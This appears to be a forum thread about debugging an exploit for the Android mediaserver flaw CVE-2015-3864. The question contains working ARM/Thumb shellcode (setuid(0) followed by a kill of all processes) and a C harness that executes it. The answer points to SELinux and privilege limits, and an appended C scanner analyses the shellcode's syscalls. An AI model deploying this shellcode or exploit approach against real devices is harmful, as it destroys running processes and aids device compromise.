Run shellcode in the context of mediaserver in Android


I am writing an exploit for a vulnerability in mediaserver in Android (CVE-2015-3864). The goal is running shellcode with root privilege (such as killing all processes). Every step of the exploit works as expected until it reaches the shellcode (at this time the shellcode is loaded in mediaserver virtual memory and rwx permission is granted to it). The shellcode is as follows:

     1) e28f3001    add  r3, pc, #1    ; 0x1
     2) e12fff13    bx   r3
     3) 1b24        subs r4, r4, r4
     4) 1c20        adds r0, r4, #0
     5) 2717        movs r7, #23
     6) df01        svc  1
     7) 1a92        subs r2, r2, r2
     8) 1c10        adds r0, r2, #0
     9) 3801        subs r0, #1
    10) 2109        movs r1, #9
    11) 2725        movs r7, #37
    12) df01        svc  1

Lines 1 and 2 are a switch between ARM mode and Thumb mode. Lines 3 to 6 are setuid(0) and lines 7 to 12 kill all running processes.
I debugged the exploit with IDA and found out that the shellcode executes until line 12 (all the registers have the expected values which are defined in the shellcode, for example r7 is 37).
MY SPECIFIC PROBLEM IS : the shellcode does not execute and has no impact on my device.
For a test case I wrote a program and ran the shellcode as a function pointer like below:

    #include <stdio.h>
    #include <string.h>

    char *SC = "\x01\x30\x8f\xe2"
               "\x13\xff\x2f\xe1"
               "\x24\x1b\x20\x1c"
               "\x17\x27\x01\xdf"
               "\x92\x1a\x10\x1c"
               "\x01\x38\x09\x21"
               "\x25\x27\x01\xdf";

    int main(void)
    {
            fprintf(stdout, "Length: %d\n", (int)strlen(SC));
            (*(void (*)(void)) SC)();   /* jump to the shellcode bytes */
            return 0;
    }

I copied this binary to /system/bin and granted exactly the same permissions as mediaserver has. I ran the binary with su permission and it works! All the processes were killed.
MY SPECIFIC QUESTION IS : Why can the shellcode not be executed in the context of mediaserver, but it can be executed independently?
Please help, I am really stuck in this state! If the question is unclear, give me feedback and I will explain it more.
Thanks in advance

invictus1306 answered:

I think you need to elevate the privilege of mediaserver (user media) to kill all processes (then you need another vulnerability). There is another problem due to SELinux sandbox restrictions: this means that the mediaserver process, when exploiting libstagefright, is protected by SELinux policy and the code execution takes place in a restrictive sandbox. In other words you should find a way for a SELinux bypass; in the nccgroup presentation you can find more details.

See also this good paper.
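As an added example (not code from the question or the answer), a small triage scanner in C that walks the Thumb part of the posted shellcode bytes and lists the syscall each `svc` makes and whether r0 is ever tested afterwards: the result of setuid(0) is overwritten by the following `adds r0, r2, #0` and never checked, so under user media the failed setuid is silent and the kill that follows runs without root and inside mediaserver's SELinux domain. The byte array is a constructed copy of the shellcode from the question; only the `movs r7`, `svc` and conditional-branch encodings are decoded.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed copy of the question's shellcode: two 32-bit ARM instructions
 * (add r3, pc, #1 ; bx r3) followed by 16-bit Thumb instructions. */
static const unsigned char SC[] =
    "\x01\x30\x8f\xe2" "\x13\xff\x2f\xe1"
    "\x24\x1b\x20\x1c" "\x17\x27\x01\xdf"
    "\x92\x1a\x10\x1c" "\x01\x38\x09\x21"
    "\x25\x27\x01\xdf";
#define SC_LEN (sizeof(SC) - 1)   /* drop the terminating NUL */
#define THUMB_OFF 8               /* byte offset where the Thumb code begins */

struct svc_info {
    int nr;        /* r7 at the time of the svc, or -1 if never set by movs r7 */
    int checked;   /* 1 if a conditional branch follows before the next svc */
};

/* Scan little-endian 16-bit Thumb code from `off`, recording each `svc`
 * (0xDFxx) together with the syscall number last loaded by `movs r7, #imm8`
 * (0x27xx), and whether the result in r0 is ever tested (any conditional
 * branch 0xD0xx..0xDDxx) before the next svc. 32-bit Thumb-2 encodings are
 * not handled; that is enough for this shellcode. Returns the number of svc
 * instructions found (at most `max` are written to out[]). */
int scan_svcs(const unsigned char *code, size_t len, size_t off,
              struct svc_info *out, int max)
{
    int r7 = -1, n = 0;
    for (size_t i = off; i + 1 < len; i += 2) {
        uint16_t insn = (uint16_t)(code[i] | (code[i + 1] << 8));
        uint8_t hi = insn >> 8, lo = insn & 0xff;
        if (hi == 0x27) {                        /* movs r7, #imm8 */
            r7 = lo;
        } else if (hi == 0xdf) {                 /* svc #imm8 */
            if (n < max) { out[n].nr = r7; out[n].checked = 0; }
            n++;
        } else if (hi >= 0xd0 && hi <= 0xdd) {   /* b<cond> label */
            if (n > 0 && n <= max) out[n - 1].checked = 1;
        }
    }
    return n;
}

int main(void)
{
    struct svc_info svcs[8];
    int n = scan_svcs(SC, SC_LEN, THUMB_OFF, svcs, 8);
    for (int i = 0; i < n; i++)
        printf("svc #%d: ARM EABI syscall %d, result %s\n", i + 1,
               svcs[i].nr, svcs[i].checked ? "tested" : "never tested");
    return 0;
}
```

For this input the scanner reports syscall 23 (setuid) and 37 (kill), both with the result never tested.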